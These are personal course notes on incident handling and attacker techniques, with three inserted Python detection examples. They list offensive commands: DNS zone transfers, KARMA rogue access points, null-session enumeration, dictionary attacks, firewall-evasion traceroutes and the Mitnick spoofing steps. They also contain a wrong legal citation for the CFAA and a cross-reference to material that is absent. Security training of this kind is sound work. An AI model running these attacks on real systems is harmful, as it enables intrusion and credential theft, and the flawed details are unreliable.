Hacker Techniques, Exploits & Incident Handling
Notes written by Uma Mahesh Padisetty

✔ Always have handwritten notes
   o Whom are you meeting, what did you ask, what commands did you run.
✔ Maybe have audio recorders with you.
   o Sometimes video recordings can have policy obligations.
✔ When you do the job, make sure management understands your value in the form of an incident handling summary, i.e., a slide of all incidents, with graphs. For a quiet month, include information from other sources such as SANS to avoid budget cuts.
✔ We need to have the appropriate people on the team; it should have core experts in all disciplines:
   o Two from Unix, two from Windows
   o Network management personnel, as we get a lot of information from routers and switches
   o In-house legal counsel
   o Sometimes we need HR for taking action on humans
   o Disaster Recovery/BCP should not be the head of incident handling.
✔ Have system build checklists, i.e., the basic system build documents for those servers etc.
✔ In order to run the bridge calls, we need a list of contact info for all key personnel or emergency calls.
✔ Test your stuff periodically (not regularly... they hate you).

Source of real-world incident scenarios: www.counterhack.net
CounterHack PPT: http://www.cs.sjsu.edu/~stamp/CS286/ppt/

✔ Incident handlers sometimes need access to devices with admin privileges
   o Bargain with the Operations team.
✔ Provide a way for users to contact the incident handling team
   o Provide a hotline number, an email address, occasional alert mails.
   o We need a special climate-controlled room (say a SOC)
✔ Always plan for backups of evidence
✔ Helpdesks are important; they are the eyes of the incident handling team
   o Educate helpdesk people to report specific incidents to us.
✔ Incident Response Kit – set of tools
   o Have a jump bag of hard disks to take backups.
   o Binary backup software – dd and windd
   o Netcat – move filesystem images across the network, take the output of certain commands
   o Forensic software
      Freeware – Sleuthkit, Autopsy
      Commercial tools – Guidance Software EnCase
   o Diagnosis software (sometimes a rootkit installed on the machine might lie to you regarding the bad guy, as the rootkit modifies the operating system itself. So carry your trustworthy set of tools on a CD or pen drive for diagnosis)
   o A good bootable Linux disk (eg: Helix)
   o Use something like taps to capture.
      Can't use hubs, switches
      Cannot use on servers
      The bad guy can identify it, as it is bidirectional
      Available from NetOptics (a USB-powered TAP is easy to use)
   o Cables (1 straight-through, 1 crossover cable, 1 USB-to-serial cable, 1 serial cable for routers, extra hard drive cable)
   o Laptop with multiple operating systems (at least virtual machines)
✔ Interview the operations people with open-ended questions like: what recent changes were made to the firewall? what recent configurations? what patches? any scripts executed?
✔ Involve your peers in handling the incident and have everyone maintain notes. Also involve the necessary people such as the administrator, business manager, risk manager, client POC, etc.
✔ Network perimeter detection: tcpdump -n, firewall logs
✔ Host perimeter detection: netstat -an, Virus Response Tool Kit (LiveIR)
✔ System administrator cheat sheets (for Windows and Linux) list the commands that system administrators use to find anomalies.

Session 2 – "Not 'If' but 'When': Essential Incident Handling Techniques for System Administrators", John Ives (jives@security.berkeley.edu), System and Network Security
   o sc – services controller; services.msc, msconfig, net view etc.
   o at – to check what jobs are scheduled; Process Explorer from Sysinternals
   o Netcat – to transfer data across TCP and UDP ports
✔ We have to create a chain of evidence (a collection of events) in a document.
   Eg: when a law enforcement officer asks for a hard drive, ask for proof (mail, fax) and then send a copy of the real one.

Preparation
Identification
Containment:
   o Short-term containment: pause the attacker temporarily without changing the configurations made by the attacker, i.e., blocking the network or port, isolating the machine.
      Maintain a good relationship with the management sponsor, who will provide resources and remove blocks. The management sponsor can be the LIRM or SDM – notify him.
      Coordinate with network personnel to isolate the machine from the network. It can be done by pulling the LAN cable from the machine or blocking the switch port attached to the machine.
      Usually bad guys hit an IP address. Change the IP in the DNS servers so that your customers come to your actual service while the bad guy tries to hit the old machine. It helps until we get some information. The problem is convincing management.
      Maintain a low profile while investigating. Do not do reconnaissance from the infected machine. If needed, do it from another machine (lab).
      Back up the machine (create images – use dd, WinDD etc. from a live CD).
      How do you deal with filesystems of terabytes of data? Usually such devices have RAID mirroring, so there is a button to synchronize the mirror. Here you go: push the button and take it.
      Using built-in backup software, copy only the system partition where the OS resides and the logs.
      Use some tools for logging the incidents and providing an incident number. Eg: RTIR (Real Time Incident Response) - http://bestpractical.com/rtir/ ; BlackThorn - http://www.qccis.com/blackthorn
   o Long-term containment and eradication: remove/disable accounts, shut down/remove backdoors, change passwords
Eradication
Recovery
Lessons Learnt <<check out the slides>>
   Ask open-ended questions. Do not ask yes/no questions.

Espionage: Espionage or spying involves an individual obtaining information that is considered secret or confidential without the permission of the holder of the information.
   Tip#1: When handling such cases, use trusted people.
   Tip#2: Try target analysis of our own organization.
   Tip#3: To generate an event while transferring critical documents, assign a unique serial number in them so that Google can bring it up; use some signature so the IDS can identify the transfer.
   Tip#4: Always have access to various logs, not just device logs but physical logs such as datacenter entry login/logout, call records of some person, surveillance videos etc.

Unauthorized use:
   Tip#1: Organizational reconnaissance.
   Phone phishing: the email states that your account has a problem, please call the number to fix it. The number goes to VoIP and a phishing IVRS of the bank asking you to input account number and PIN for authentication.
   Inappropriate web access: pull the proxy logs (but do it only if HR asks in writing, not when the manager asks). Bluecoat, SurfControl etc. can block unwanted sites categorized as Pornography, Malware Sources etc.

Insider threat: It could be a contractor, business partner or employee. It can be destructive or non-destructive (which doesn't mean not damaging; they copy and take it out). They might plant logic bombs. A warning banner helps prevent insider threat. Always get authorization from HR when monitoring a suspicious person; otherwise they might sue you. Ask open-ended questions...

Intellectual property theft:
   Patents: protect innovations
   Copyrights: protect specific expressions of ideas, content
   Trademarks: protect brands
      Confusion attack: using the same fonts and colors to confuse between the original and a duplicate, eg: Microsoft and Microsaft.
   Trade secret protection: things we derive economic value from by their being secret. Provides various penalties for violation.
   Protecting against theft: How do you identify a breach of intellectual property? To prove the theft and the intellectual property violation, we need to show that we put enough protection on it.
Law, Crime and Evidence
Three domains: US Federal Law: Title 10 Section 2030: Computer Fraud and Abuse Act
   1) Computers working for government
   2) Computers associated with infrastructure
   3) Computers associated with e-commerce
   The laws apply only if damage > $5000

DAY 2 Session 1
Talks about vulnerabilities, disclosures and complications.
   Whenever a vulnerability is found, it is advised to contact the vendor and go public when he patches, or after a timeframe of 90 days (mostly), and even 180 days, before going public.
   If the vulnerability is found via reverse engineering, you could be sued under the DMCA Act.
   TippingPoint will buy the vulnerabilities.
   Send the vulnerability via a proxy like US-CERT or SANS ISC.
Hacktivism: hacking to make a political point.
   Create a malware, create a botnet, rent the botnet (eg: for hacktivism)
   Scareware, codecs – drive-by downloads

How does a hacker start attacking? Reconnaissance
Whois – one can get the contact information of the domain
   Find out the registrar associated with the domain; the registrar would provide details.
   Sometimes the IP can be a block of IPs; it can be the ISP. http://yehg.net/lab/pr0js/misc/wsa.php
   Sometimes when the contact is a person, social engineering can be played on him for reconnaissance.
   P.S: There are some anonymous registrars who will not put up the owner's information. This slows down the contacting process.
DNS Interrogation
   Bad guys always want to have as many records as possible.
   Zone transfers – the hacker's way to get the most out of DNS. A zone transfer is used to transfer DNS records from the primary NS to the secondary NS; however, hackers exploit it to collect the DNS records. There are Perl scripts (found on BT) for DNS enumeration.
   dig can be used for a zone transfer:
   Get the name server:
      #dig counterhack.com   <<provides the name server of counterhack.com>>
   Ask the name server about the domain using the AXFR (or IXFR) protocol:
      #dig @ns1.highland-parking.net counterhack.com axfr
   [As a security feature, most name servers might have disabled it]
   nslookup on Windows serves the same purpose.
   Usually organizations keep secondary and tertiary NS with the ISP, which may support zone transfers. Send a mail to the ISP to block it.
   DNS is highly critical infrastructure; always harden it.
   Identification of DNS compromise: look for zone transfers – normal DNS uses UDP 53 while zone transfers use TCP 53. Also look for DNS responses bigger than 512 bytes. Also a DNS request bigger than 512 bytes can be a buffer overflow attack.

Website searches: press releases, job openings, business partners, phishing attacks on employees
   Defences: Preparation: look at your own websites; see what your employees talk about in newsgroups; make job opening descriptions generic; identify web crawler activity from the logs.

Google searches: Johnny Long – Using Google for Penetration Testing
   phonebook: James Smith – Google provides a phone book search (US directory)
   site: isc.sans.com – search only within this site
   link: wikihead.wordpress.com – shows everything that links to that site
   intitle: Honeypot Indepth – searches the keywords in the title. Sometimes the files on the server are listed with the title "Index"; hence "site:domain.com intitle:index"
   inurl: robots.txt – searches the term in the URLs. Helps identify critical files like the one shown here.
   wikihead -malware – discards the term malware from the search (minus)
   + – Eg: 'X and Y' strips out "and", so use X+and+Y
   X.Y – one-character wildcard
   Google Cache: contains the website image from Google's servers. Helps to view deleted contents on the site. P.S: Data in the Google cache can be removed by using Google Webmaster Tools.
   Language translation: http://translate.google.com – browse the website using Google Translate.
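As an added example (not part of these notes or of any tool they mention), the three DNS indicators above turned into detection logic that runs over constructed flow records; the flow fields and the sample traffic are assumptions, and the 512-byte threshold is the classic RFC 1035 limit.

```python
"""Added example: detection logic for the DNS indicators in the notes above.
Zone transfers ride TCP/53 while normal lookups use UDP/53, and classic DNS over
UDP is capped at 512 bytes, so oversized queries or responses deserve a look.
The flow records below are constructed, not taken from a live capture."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

UDP_DNS_MAX = 512  # RFC 1035 limit; EDNS0 legitimately exceeds it, so tune for your resolvers


@dataclass(frozen=True)
class DnsFlow:
    proto: str          # "udp" or "tcp"
    client: str         # IP that sent the query
    server: str         # name server IP (port 53 assumed)
    direction: str      # "query" or "response"
    length: int         # DNS payload size in bytes
    authoritative: bool = False  # True if `server` is one of our own authoritative NS


def classify(flow: DnsFlow) -> List[str]:
    """Return the reasons one DNS flow looks suspicious; an empty list means benign."""
    reasons = []
    if flow.proto == "tcp":
        # Resolvers use UDP; a TCP/53 session to an authoritative server is the AXFR/IXFR path.
        where = "tcp/53 to our authoritative NS" if flow.authoritative else "tcp/53"
        reasons.append(f"{where}: possible zone transfer (AXFR/IXFR)")
    elif flow.length > UDP_DNS_MAX and flow.direction == "response":
        reasons.append(f"udp response of {flow.length} bytes exceeds {UDP_DNS_MAX}")
    elif flow.length > UDP_DNS_MAX:
        reasons.append(f"udp query of {flow.length} bytes exceeds {UDP_DNS_MAX}: "
                       "possible buffer overflow attempt against the server")
    return reasons


def audit(flows: List[DnsFlow]) -> Dict[str, List[str]]:
    """Group findings per client so the analyst sees who is pulling records."""
    findings = defaultdict(list)
    for flow in flows:
        for reason in classify(flow):
            findings[flow.client].append(reason)
    return dict(findings)


# Constructed sample: one normal lookup, one AXFR attempt, one oversized query, one big reply.
SAMPLE_FLOWS = [
    DnsFlow("udp", "10.0.0.21", "10.0.0.53", "query", 45, authoritative=True),
    DnsFlow("udp", "10.0.0.21", "10.0.0.53", "response", 120, authoritative=True),
    DnsFlow("tcp", "203.0.113.9", "10.0.0.53", "query", 33, authoritative=True),
    DnsFlow("tcp", "203.0.113.9", "10.0.0.53", "response", 18400, authoritative=True),
    DnsFlow("udp", "198.51.100.7", "10.0.0.53", "query", 1900, authoritative=True),
    DnsFlow("udp", "10.0.0.22", "8.8.8.8", "response", 900),
]

if __name__ == "__main__":
    for client, reasons in audit(SAMPLE_FLOWS).items():
        print(client)
        for reason in reasons:
            print("   ", reason)
```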
   You can browse anonymously... (not ultimately anonymous)
   filetype: pdf – reports only PDF files with the given search terms
   ext:rdp – shows RDP files (Remote Desktop files)
   GHDB – Google Hacking Database
   robots.txt – lists the files or folders that should not be crawled. [Honeypot use: check the IP that accessed a file mentioned in robots.txt... it is a malicious bot]
   noindex, noarchive, nosnippet etc. written to robots.txt can prohibit the Google bot from capturing unwanted info on the server.
   User Agent Switcher: a plugin for Firefox to change the User-Agent of the web request.
   Google URL crawl request form: Google crawls the site from scratch again, from the root.
SamSpade – a simple tool for whois, DNS, tracert etc. for reconnaissance. It has a web crawler.
wget -r [web crawling for local mirroring]

SCANNING
War dialing:
   Phone sweep: dial the numbers in sequence.
   Nudge string: replay a pattern of signals when a modem is found (modem-style attack)
   Remediation: use a modem only if the vendor has a strong requirement; even if used, ask for strong user IDs and passwords. Conduct a war dialing exercise. [There are voice IPSs which detect war dialing and block the calls to the modem if vulnerable]
   As an IR member, you should have contact with the person who can tell you where the phone line ends inside the company.
NetStumbler: a good tool for war driving for wireless access points. If WEP is used, capturing some packets can crack the keys.
Aircrack-ng: a superb one to crack WEP keys.

SESSION 2
KARMA - http://www.wirelessdefence.org/Contents/KARMAMain.htm
KARMA is a set of tools for assessing the security of wireless clients at multiple layers.
   1. It passively sniffs the 802.11 probe request packets and thereby discovers clients.
   2. From the packets, it extracts what network the clients want to connect to (I guess it would be the SSID).
   3. KARMA includes patches for the Linux MADWifi driver to allow the creation of an 802.11 access point that responds to any probed SSID.
   4. It starts the services ACCESS-POINT, DNS-SERVER, DHCP-SERVER, FTP-SERVER.
   5. When the user wants to connect to the internet via the SSID, KARMA acts as a MITM, assigns a DHCP IP to the victim and captures all the traffic. It acts as a fake DNS and FTP server to capture credentials and returns nothing.
   karma-lan.xml - "This configuration runs rogue DHCP, DNS and HTTP services on an existing (wired) network connection. The HTTP service redirects all requests to the ExampleWebExploit module that displays a simple HTML page"
   Usage:
      cd /tools/wifi/karma-20060124
      bin/monitor-mode.sh ath0
      bin/karma etc/karma-lan.xml

ASLEAP – exploits the Cisco LEAP protocol
http://www.wirelessdefence.org/Contents/AsleapMain.htm
   The Lightweight Extensible Authentication Protocol (LEAP) is a proprietary wireless LAN authentication method developed by Cisco Systems. Important features of LEAP are dynamic WEP keys and mutual authentication (between a wireless client and a RADIUS server). LEAP allows clients to reauthenticate frequently; upon each successful authentication, the clients acquire a new WEP key (with the hope that the WEP keys don't live long enough to be cracked). LEAP may be configured to use TKIP instead of dynamic WEP.
   The password itself is not transferred while authenticating, but some complicated hash... blah, blah, blah... is transmitted over the air for authentication. There is a weakness which is exploited by a dictionary attack against those transmitted hashes to retrieve WEAK PASSWORDS.
   A simple defense strategy employed is MAC filtering at the AP... Oh... the MAC is spoofable. Just sniff the MAC from packets and use it when the machine is offline.
   WPA2 is a stronger access authentication mechanism.
   Attacking aggressive mode IKE, which is used for wireless VPN connections, is easily done. It takes shortcuts to improve performance by avoiding rekeying.
IKE Aggressive Mode: In IKE aggressive mode the authentication hash based on a pre-shared key (PSK) is transmitted as the response to the initial packet of a VPN client who wishes to establish an IPSec tunnel. This hash is not encrypted. A packet sniffer (i.e. tcpdump) can be used to capture these hashes, and a dictionary or brute force attack can be used against the hash to recover the PSK. This attack only works in IKE aggressive mode, because in IKE main mode the hash is already encrypted. Based on this fact, we can learn that IKE aggressive mode is not very secure.
   Tool: IKECRACK - http://ikecrack.sourceforge.net/
   Hence the tip is: disable aggressive IKE.
   Proof of concept: http://www.ernw.de/download/pskattack.pdf

Cisco APs have an integrated security mechanism and can also assist by jamming the rogue machine. But it is problematic, as it can jam any machines in the vicinity that belong to another company. Mostly jamming is legally banned and will not be used. I believe the other guy can sue you.
There are some WIPS such as AirMagnet, AirDefense.

WIRELESS LAN Security Policies
   WEP shouldn't be used
   Disable aggressive IKE
   When jammers are used, put up a sign board notifying the same

<<Working with NetStumbler>>
Is war driving with NetStumbler legal? Ans: It depends... since it sends BEACONs and receives responses. Hence it is advised to disable DHCP. Passively sniffing is legally wrong, as it might violate their privacy.

TIME: 30 MINS complete

Network Mapping: We need to get the topology.
Cheops-NG: http://www.digipedia.pl/man/doc/view/cheops-ng.1/
   It is a simple tool that provides network mapping by using host discovery and also port discovery on the machines.
   It uses ping and traceroute for network mapping:
      Sending a traceroute packet with TTL = 1, I get the first-hop machine
      Sending a traceroute packet with TTL = 2, we get the second-hop machine
   Features:
      Host discovery - uses ICMP ping packets
      Machine fingerprinting to determine OS (using Nmap) - runs an nmap command to determine the OS fingerprint
      Use of DNS and ICMP to detect network hosts
      Network mapping - mapping is done using UDP (or optionally ICMP) packets with small time-to-live values (traceroute and mtr, respectively)
   Usage:
      1. First start the Cheops agent on the machine: #cheops-agent &
      2. Connect to the Cheops agent: #cheops-ng
      3. Enter the IP of the machine on which cheops-agent is running; currently it is localhost
      4. Add a host in the workspace; just one target machine
   Recommendations:
      ✔ Usually corporates block pings.
      ✔ Also block outgoing ICMP packets.

>>>Simple details on TCP, UDP headers<<<

Port Scanner – NMAP http://www.insecure.org/presentations/Shmoo06/
   (nmap on Windows is not reliable due to the non-robust TCP/IP stack in Windows)

Break: 1:35 Hrs

Defenses
   ● Disable all ports until there is a business need; periodically check the rule base for its need.
   Tools:
      Windows:
         netstat -a, netstat -ab --- lists all details of the DLLs and processes that are connected
         TCPView
         WMIC (Windows Management Instrumentation Command-line)
      Linux:
         lsof (list open files)
            lsof -i -- shows open connections
            lsof -- lists all the open files of all applications
         kill – kills the process
         chkconfig – used to manage which services load in each of the runlevels
            chkconfig --list [name]
            chkconfig --add name
            chkconfig --del name
            chkconfig [--level levels] name <on|off|reset>
            Eg: chkconfig --add xinetd
                chkconfig --level 5 xinetd off
Exercise: Do TCP scan, decoys, SYN stealth scan, connect scan
   To check outgoing packets – tcpdump -lio
   Version scanning
   Why not a connect scan with a decoy scan?
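An added example, not part of these notes, of the "open port needs a business justification" check from the Defenses list: it parses `netstat -an` output in both the Linux and Windows layouts and reports listeners that are not on an approved list (the JUSTIFIED set and the two sample outputs are constructed assumptions). The same check serves the later Netcat defense of periodically looking for unexpected persistent listeners.

```python
"""Added example: audit listening sockets against the ports that have a documented
business need. Parses constructed `netstat -an` text in the Linux layout
(Proto Recv-Q Send-Q Local Foreign State) and the Windows layout
(Proto Local Foreign State); no live system is queried."""
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Constructed baseline: (protocol, port) pairs with a documented owner on this host.
JUSTIFIED: Set[Tuple[str, int]] = {("tcp", 22), ("tcp", 443), ("udp", 123)}

LISTEN_STATES = {"LISTEN", "LISTENING"}   # Linux and Windows spellings
PROTOCOLS = ("tcp", "tcp6", "udp", "udp6")


@dataclass(frozen=True)
class Listener:
    proto: str   # "tcp" or "udp" (IPv6 variants folded in)
    addr: str    # local bind address
    port: int


def parse_netstat(output: str) -> List[Listener]:
    """Extract listening sockets from `netstat -an` output of either layout."""
    listeners = []
    for line in output.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].lower() not in PROTOCOLS:
            continue                      # headers, blank lines, unix sockets
        proto = tokens[0].lower().rstrip("6")
        # The first token containing ':' is the local address; rsplit keeps IPv6 intact.
        local: Optional[str] = next((t for t in tokens[1:] if ":" in t), None)
        if local is None:
            continue
        addr, port = local.rsplit(":", 1)
        if proto == "tcp" and tokens[-1] not in LISTEN_STATES:
            continue                      # established / time-wait rows are not listeners
        # UDP rows carry no state: every bound UDP socket accepts datagrams.
        listeners.append(Listener(proto, addr, int(port)))
    return listeners


def unexpected_listeners(output: str, justified: Set[Tuple[str, int]] = JUSTIFIED) -> List[Listener]:
    """Listeners with no justification: each needs an owner or a shutdown."""
    return [l for l in parse_netstat(output) if (l.proto, l.port) not in justified]


# Constructed Linux sample; 17876 mirrors the Netcat backdoor port used later in the notes.
LINUX_SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:17876           0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:22             10.0.0.9:51022          ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN
udp        0      0 0.0.0.0:123             0.0.0.0:*
"""

# Constructed Windows sample: NetBIOS/SMB listeners and one outbound connection.
WINDOWS_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.168.0.5:4444       192.168.0.198:49153    ESTABLISHED
  UDP    0.0.0.0:123            *:*
"""

if __name__ == "__main__":
    for name, sample in (("linux", LINUX_SAMPLE), ("windows", WINDOWS_SAMPLE)):
        for l in unexpected_listeners(sample):
            print(f"{name}: unjustified listener {l.proto}/{l.port} bound to {l.addr}")
```

Note that an outbound reverse-shell connection (the ESTABLISHED row to port 4444) never appears as a listener; that case needs process and connection review, not this check.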
Passive Fingerprinting
   p0f2
   NetworkMiner - http://networkminer.sourceforge.net/ – it can also pull out files transferred from the dump files and clear-text contents in the dumps. Very nice tool.

Determining Firewall Rules
✔ Using ICMP instead of UDP for traceroute can reveal info about the devices behind the firewall, as they may not be blocked by the firewall:
      #traceroute -I 10.9.23.1
✔ UDP port 53 is usually unblocked at the firewall since it is needed for DNS queries/responses. Hence we need to fool the firewall. Normal traceroute increases the source port monotonically with each hop, and three packets are delivered to each hop. So in order to send a packet that has port 53 at the firewall, we have to set the initial port number as TargetPort – (number_of_hops * number_of_probes) – 1, i.e., 53 – (8 * 3) – 1 = 28 [suppose the number of hops before reaching the gateway is 8]
      #traceroute -p28 10.9.23.1
   This will only give info about the device just after the gateway :(
   Instead, stop the incrementing:
      #traceroute -S -p53 20.9.23.1
✔ Layer Four Traceroute (lft): it determines what packets are allowed through the firewall.
✔ Firewalk - http://packetstormsecurity.org/UNIX/audit/firewalk/firewalk-0.99.1.tar.gz
   It employs traceroute-like techniques to analyze IP packet responses to determine gateway ACL filters and map networks. Firewalk the tool employs the technique to determine the filter rules in place on a packet forwarding device. In order to use a gateway's response to gather information, we must know two pieces of information:
      • The IP address of the last known gateway before the firewalling takes place
      • The IP address of a host located behind the firewall.
   Using proxy servers can eliminate firewalking. Some NIDS also detect firewalking.

2:28 PM – Vulnerability scanning
These vulnerability scanners detect only known vulnerabilities and do not identify zero-day vulns. Hence it is always advised to have multiple layers of security.
As an exercise, just take the topology of the DMZ and assume that one machine is compromised by a zero-day vulnerability. Then think of the solution.

Nessus
   It generates huge reports, which are hard to understand. It also does not do correlation or cross-correlation.
   Nessus has plugins, where each plugin runs one test on the target environment. NASL (Nessus Attack Scripting Language) is used to create plugins.
   Architecture: the Nessus client communicates with the Nessus daemon server and tells it to do the scan.
   NessJ – a Java-based Nessus client that presents results in an understandable format.
   Dangerous plugins – can cause damage to the end system (like DoS-based plugins for checking vulns).
   1. Install Nessus
   2. Create a certificate: #nessus-mkcert
   3. Add a user: #nessus-adduser
   4. Start the Nessus server daemon: #nessusd -D
   5. Start the Nessus client: #nessus
   6. The Nessus GUI is displayed; log in and start the scan
   7. It is advised to run updates periodically: #nessus-update-plugins

WebApp Scanners
   They know about known CGI vulnerabilities, Active Server Page vulnerabilities etc. Eg: AWStats vulnerabilities, phpBB vulnerabilities.
   Nikto WebApp Scanner – a free tool written in Perl. It looks at CGI files for vulnerabilities; it looks into robots.txt; it has a port scanner; it has application-level IDS evasion; it supports web authentication; it supports SSL; it has mutation functionality.
   Wikto – a similar tool with a GUI that includes Google Hacking DB support.

IDS Evasion
   Packet fragmentation – the technique is used to evade detection. In the IP header: DF bit – Don't Fragment; MF bit – More Fragments are coming; Fragment Offset – used for reassembly; the IP ID value is used to assemble the fragments.
   However, wireline IDS detect these attacks using virtual packet reassembly buffers. Unfortunately, wireless IDS do not detect fragmented packets, and they can easily pass through.
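An added example, not from these notes, of the virtual packet reassembly buffer an IDS keeps: it rebuilds a datagram from IP fragments and resolves overlapping bytes under two policies, since different operating systems keep either the older or the newer data and an IDS that picks the wrong policy inspects a different payload than the target receives. The fragment layout and payloads are constructed for illustration.

```python
"""Added example: a toy virtual packet reassembly buffer of the kind a wireline IDS
keeps. IP fragments (offset in 8-byte units, MF flag, payload) are rebuilt into the
datagram; overlapping bytes are resolved with either a 'first' policy (keep what
arrived first) or a 'last' policy (newer data wins), because real stacks differ
and an IDS that picks the wrong policy sees a different payload than the target.
The fragments below are constructed for illustration."""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Fragment:
    ip_id: int
    offset: int        # Fragment Offset field, in 8-byte units
    more: bool         # MF flag: more fragments follow
    payload: bytes


class Reassembler:
    def __init__(self, policy: str = "first"):
        if policy not in ("first", "last"):
            raise ValueError("policy must be 'first' or 'last'")
        self.policy = policy
        self._bytes: Dict[int, Dict[int, int]] = {}   # ip_id -> {byte position: value}
        self._total: Dict[int, int] = {}               # ip_id -> datagram length, once MF=0 seen

    def add(self, frag: Fragment) -> Optional[bytes]:
        """Insert one fragment; return the reassembled datagram when complete, else None."""
        if frag.more and len(frag.payload) % 8:
            raise ValueError("a non-final fragment must carry a multiple of 8 bytes")
        buf = self._bytes.setdefault(frag.ip_id, {})
        start = frag.offset * 8
        for i, value in enumerate(frag.payload):
            pos = start + i
            if pos in buf and self.policy == "first":
                continue          # 'first': the earlier fragment's byte stands
            buf[pos] = value      # 'last': overwrite with the newer fragment's byte
        if not frag.more:
            self._total[frag.ip_id] = start + len(frag.payload)
        total = self._total.get(frag.ip_id)
        if total is not None and all(pos in buf for pos in range(total)):
            del self._bytes[frag.ip_id]
            del self._total[frag.ip_id]
            return bytes(buf[pos] for pos in range(total))
        return None   # still waiting for holes to be filled


def reassemble(frags: List[Fragment], policy: str) -> Optional[bytes]:
    """Feed all fragments to a fresh buffer and return the datagram it produces."""
    buffer = Reassembler(policy)
    result = None
    for frag in frags:
        result = buffer.add(frag) or result
    return result


# Constructed overlap: fragment 1 covers bytes 0-15; fragment 2 starts at byte 8
# (offset 1), so its first 8 bytes collide with the tail of fragment 1.
OVERLAP = [
    Fragment(0x1234, 0, True, b"GET /ind" + b"ex.html "),
    Fragment(0x1234, 1, False, b"ADMIN.ok" + b"HTTP/1.0"),
]

if __name__ == "__main__":
    for policy in ("first", "last"):
        print(policy, reassemble(OVERLAP, policy))
```

Under the 'first' policy the datagram reads `GET /index.html HTTP/1.0`; under 'last' it reads `GET /indADMIN.okHTTP/1.0`, which is the ambiguity that overlapping-fragment evasion relies on and why an IDS must model the target's reassembly behaviour.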
   Sending small packet fragments (session splicing)
   Pausing between fragments so that the IDS times out but the host machine does not
   Overlapping fragments - for example, the first packet will include 80 bytes of payload but the second packet's sequence number will be 76 bytes after the start of the first packet. When the target computer reassembles the TCP stream, it must decide how to handle the four overlapping bytes. Some operating systems will take the older data, and some will take the newer data.
   Some IDS give you the option to block fragmented packets, although it is not recommended. Check before blocking.
   FragRouter
      o Runs on Unix/Linux systems
      o Provides over 35 different schemes for fragmenting the flow of data
      o Separates attack functionality from the fragmentation functionality
      Some fragmentation types:
      o Sends data in ordered 8-byte fragments
      o Sends data in ordered 24-byte fragments
      o Sends data in ordered 8-byte fragments with one fragment out of order
      o Complete TCP handshake, send fake FIN and RST (with bad checksums) before sending data in ordered 1-byte fragments
   Obfuscating the attack payload: send the data such that the IDS cannot understand it but the victim machine can. Viz., using Unicode encoding, attacking via HTTPS (usually backdoors planted by the attacker work under HTTPS).
   Inserting traffic at the IDS: send traffic such that only the IDS sees it and determines state for a machine, but the packet actually doesn't reach the end machine. I.e., by sending a RST packet with a low TTL value so that it expires after reaching the IDS. Also by sending a packet with a bad checksum so that the end machine will discard it.

Gaining Windows Data through Null Sessions [Enumeration]
   The most powerful account on the machine – SYSTEM [not Administrator]
   A null session is an anonymous request that comes in saying "I am nobody, coming from nowhere, please give me some data". With a NULL session hackers can call APIs and use Remote Procedure Calls to enumerate information.
   These techniques can, and will, provide information on passwords, groups, services, users and even active processes. NULL session access can also be used for escalating privileges and performing DoS attacks.
   Information usually enumerated by intruders: network resources and shares, user accounts and groups, applications.
   Anyone with a NetBIOS connection to your computer can easily get a full dump of all your usernames, groups, shares, permissions, policies, services and more using the null user. Just check for open ports 139 and 445 on your machine, which are the NetBIOS ports; almost 90% of machines have them open.
   Sample hack using a NetBIOS null session:
   1. Impacket samrdump - an application that communicates with the Security Account Manager Remote interface from the DCE/RPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.
      bt smb-enum # samrdump.py guest:''@192.168.1.104 139/SMB
      Retrieving endpoint list from 192.168.1.104
      Trying protocol 139/SMB...
      Found domain(s):
       . YOUR-O1N9OY17SK
       . Builtin
   2. DumpSec – dumps information about system users, file system, registry, permissions, password policy and services
   3. enum – a simple console-based tool that can be used in scripts
      #enum -u --- lists users
      #enum -g --- lists groups
      #enum -s --- lists shares
      #enum -p --- lists the password policy
      C:\> enum -D -u <username> -f <dictionary>
      dictionary is a file containing a list of passwords, which can be obtained from any password cracking tool
      Download link for Windows: http://www.indianz.ch/tools/scan/enum.zip
   4. WinFingerprint
   Having established a session, we can use tools like rpcclient to execute RPC commands on the client machine.
   Defense: change the registry entry RestrictAnonymous to 0x02 under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA [Default: 0x01]. Drop the packets destined for ports 135-139 and 445.

Day 3
   Spoofing, Sniffing, MAC Flooding, ARP Spoofing, Session Hijacking, DNS Poisoning, Buffer Overflows, Format String Attacks & Exploits

Spoofing
   Decoy scans with Nmap are examples of spoofing. They are done to exploit trust relationships, to pass through ACLs, for DoS attacks, and to avoid logging attacker traces.
   1. Change IP address
   2. TCP guessing
   3. Source routing
Change IP Address
   On Unix, the source IP can be changed via ifconfig. On Windows, it can be changed via the Network control panel or netsh.
   Tools:
      Nemesis – it presents itself like a TCP/IP stack; you fill in the data and it crafts the packets
      Hping2
      Netdude – it can read pcap files and graphically represent the communication. Here we can edit the connection settings etc. and save the capture. Now we are ready for a replay attack.
   Now the problem is: how do you get through the TCP 3-way handshake with spoofing? The receiver sends a SYN/ACK to the spoofed address, which sends back a RST. So what's the use? Spoofing is useful for UDP kinds of attacks.
TCP Guessing
   The Mitnick attack to create a 3-way handshake. Prior to launching the attack, sample as many packets as possible from the admin server and do statistical analysis to predict the sequence number.
   1) Disable admin
   2) Send a spoofed SYN packet
   3) Send a spoofed ACK packet with the predicted sequence number
   4) From the target machine's perspective, it has established a TCP connection to admin
   5) Now execute a command: "Please add attacker to the .rhosts file"
   6) Now the attacker can directly authenticate with the target machine
Source Routing
Defences
   1. Make TCP sequence numbers highly random, i.e., always apply patches from the vendor if they belong to the TCP stack
   2. Be careful with trust relationships (rlogin, rsh). It is advised not to extend trust relationships beyond the firewall.
      It is recommended to allow trust relationships only between machines having the same level of control, threat and security. Also, with a firewall we can block the intruding attempts.
